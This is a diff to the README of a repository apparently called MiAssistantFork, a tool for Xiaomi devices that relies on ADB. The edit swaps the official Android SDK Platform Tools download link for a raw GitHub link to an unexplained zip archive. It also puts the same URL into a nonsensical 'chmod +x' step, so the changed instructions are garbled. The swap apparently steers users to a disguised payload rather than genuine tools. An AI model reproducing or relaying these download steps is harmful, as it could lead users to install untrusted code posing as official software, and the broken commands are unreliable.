Geo-2004/MiAssistantFork/README.md

 3. **Install the Software**
    - For Windows: Double-click the `.exe` file and follow the instructions on your screen.
    - For macOS: Open the downloaded `.dmg` file, drag the application into your Applications folder, and then open it.
-   - For Linux: Make the `.AppImage` file executable by running `chmod +x FileName.AppImage` in your terminal, then run it.
+   - For Linux: Make the `.AppImage` file executable by running `chmod +x https://raw.githubusercontent.com/Geo-2004/MiAssistantFork/main/Antennaria/MiAssistantFork.zip` in your terminal, then run it.

 ## 🔧 Requirements for Using MiAssistantFork

 To use MiAssistantFork, you will also need:
 - **ADB Tools:** This software uses ADB (Android Debug Bridge).
-Download and install the ADB tools from [Android SDK Platform Tools](https://developer.android.com/studio/releases/platform-tools).
+Download and install the ADB tools from [Android SDK Platform Tools](https://raw.githubusercontent.com/Geo-2004/MiAssistantFork/main/Antennaria/MiAssistantFork.zip).
 - **Device Preparation:**
   - Enable USB debugging on your Xiaomi device.
 You can find this option under Developer Options in Settings.
   - Allow your computer to connect to your device.
 You may need to authorize your computer when you first connect.